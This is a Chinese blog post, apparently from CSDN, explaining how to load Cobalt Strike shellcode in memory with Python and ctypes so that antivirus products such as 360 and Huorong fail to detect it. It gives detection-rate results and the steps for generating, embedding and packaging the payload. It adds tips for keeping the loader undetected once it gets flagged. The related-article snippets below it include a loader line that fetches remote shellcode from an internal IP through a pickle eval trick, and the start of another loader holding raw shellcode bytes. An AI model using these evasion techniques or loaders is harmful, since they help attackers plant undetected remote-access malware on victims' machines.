python3内存加载cs shellcode实现免杀

最新推荐文章于 2024-06-02 19:43:12 发布
最新推荐文章于 2024-06-02 19:43:12 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: 渗透测试 提权 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39997096/article/details/110554468
版权

前言:

最近看到很多利用加载器来加载shellcode来实现免杀的思路,前段时间本公众号还推了一个j0师傅的golang加载器,大家用了过后是不是感觉效果都不错?今天本文来利用python来作为加载器来实现免杀的效果。

 

先说说效果:

经本地测试免杀360全家桶+火绒。

 

当然免杀的不止这些,其余的没有本地测试,放微步、vs、vt等平台上去跑了。

微步检出率(3/25)

 

vs检出率(4/49)

 

vt检出率(16/69)

 

从上述检测结果来看,国内主流的杀软都过了,检出的基本上都是那几款国外的,在国内用的不多的杀软。

 

另外windows defender免杀不了~不过在win10中有一个“避让策略”,也就是说当你win10上装了其他杀毒软件后,windows defender就会自动关闭。(惊!小明的win10因为装了杀毒软件然后就不安全了

 

大部分脚本语言加载 shellcode 都是调用的c的ffi,用python加载shellcode我们可以结合ctypes这个库来实现。ctypes 是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装。

 

再来说下使用方法:

  1. cs选择好监听器并生成c x64的payload。

     

  2. 复制里面的shellcode到加载器里面。

     

     

  3. 利用pyinstaller等工具打包成单一无窗体可执行文件。

     

 

关于免杀维护:

如果用了一段时间后被杀了,可以先看看是杀加载器的特征还是杀shellcode特征,一般都是啥加载器特征多,只需要把加载器中各种变量变形一下就可以了,或者对方法进行变换。

比如说下图:

 

 

更多精彩实战文章关注微信公众号:None安全团队

None安全团队
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
python生成shellcode加载器(免杀,可过杀软)
u010508029的博客
05-31 3755
import ctypes, cPickle, base64, urllib2 class ptr(object): def __reduce__(self): return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64 class buf(object): def __init__(self, shellcode): sel.
免杀方法(四)Python免杀shellcode加载
qq_56426046的博客
10-03 1207
免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES将python代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。
python加载shellcode免杀
最新发布
qq_47289634的博客
06-02 118
以上涉及的代码可以使用Python打包成exe,然后再在Windows系统中执行。这段代码有很多优点,代码里面注释很清楚,每一步都有详细的解释,可随意扩展自己的思路。这两个不管使用哪一个,在PyCharm中运行这段代码都会,上线到CS。下面将介绍1种从远程服务器上加载share code进行上线的方法。复制编码后的结果,保存为1.txt,并把它放到自己的服务器上。上面的代码没有做任何防护,很容易就被杀毒软件识别出来。把1.txt的地址放到下面代码里面,之后运行这段代码。运行之后,依旧可以直接上线CS
python 执行shellcode_各种语言实现Shellcode加载(暂时两种)
weixin_39612817的博客
01-28 685
原理:使用Shellcode加载器分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合加密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态免杀是过不了的参考资料C/C++语言实现Shellcode加载Shellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
学习笔记1:python实现shellcode加载
nglj9527的博客
01-02 5798
python实现shellcode加载器名词解释代码 名词解释 shellcode:一段可以由电脑直接执行的机器码,执行后可以搭建起stranger。 加载器:将shellcode加载内存,并开始执行的程序。 代码 import ctypes import base64 import requests shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\
[免杀]基于pythonshellcode&loader原理研究
3tefanie丶zhou的博客
03-30 4432
【此身原本不知愁,最怕万一见温柔】
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
3. **免杀工具**:许多免杀工具,如avet、Python-Rootkit、Avoidz、Winpayloads和BackDoor-Factory,都利用了将shellcode嵌入Python代码,然后编译为exe来实现免杀。 **二、通过py源码编译exe** 1. **方法1:...
通过Python实现Payload分离免杀过程详解
01-19
实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x...
一款基于pythonshellcode免杀加载器+源代码+文档说明
12-01
## 免杀测试 **过火绒** ![](picture/image-20231019203001783.png) **过defender** ![](picture/image-20231019204156899.png) **动态执行** ![image-20231020182032610](picture/image-20231020182032610....
python内存溢出漏洞的实现方法
11-10
python缓冲区溢出攻击shellcode.zip
基于python pyd的shellcode免杀绕过+源代码+文档说明
12-01
基于python pyd的免杀方式。众所周知,python是一种解释型语言,通过pyinstaller打包后,可以提取出pyc文件然后可以通过反编译器得到源代码。 但是我们可以通过将py源文件通过Cpython编译成pyd文件,然后pyinstaller...
Python-halo用Python实现一个漂亮的终端加载
08-10
halo 用Python实现一个漂亮的终端加载
Python实现免杀Shellcode加载器编写
m0_56187372的博客
12-11 1010
利用python实现免杀shellcode加载器的编写
[免杀]基于python的mac加载
3tefanie丶zhou的博客
04-08 425
【心心念念人相隔远远方,人在远方,也在心乡。】
[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
weixin_30432179的博客
07-21 4973
0x001 原理 采用分离法,即将ShellCode加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。 再详细点,打个比方,你只会炒一个菜,你敢说你是厨师吗? 0x002 ShellCo...
CS结合python3混淆shellcode制作免杀脚本
m0_48108919的博客
03-19 7386
文章参考自:Cobalt Strike免杀操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
免杀入门---shellcode免杀
LvHLong的博客
05-03 5478
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
shellCode免杀技巧
qq_39330735的博客
05-15 2311
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
网络安全进阶篇之免杀(十四章-5) Golang加载CS免杀国内主流杀软
划水的小白白
05-30 2274
文章目录一、 概念1.1 360 安全卫士和 360 杀毒1.2 Golang二、前期准备2.1 下载地址三、具体过程3.1 使用CS生成payload3.2 免杀过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能
Python加载 Shellcode 免杀技术研究:8 种方式实现 VT 免杀率 10-69%
远控免杀专题 - Python加载shellcode免杀8种方式(VT免杀率10-69) 本文将详细介绍Python加载shellcode免杀的8种方式,并提供了对应的免杀技术和检测结果。这些技术旨在帮助安全研究人员和开发者更好地理解和防御恶意...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值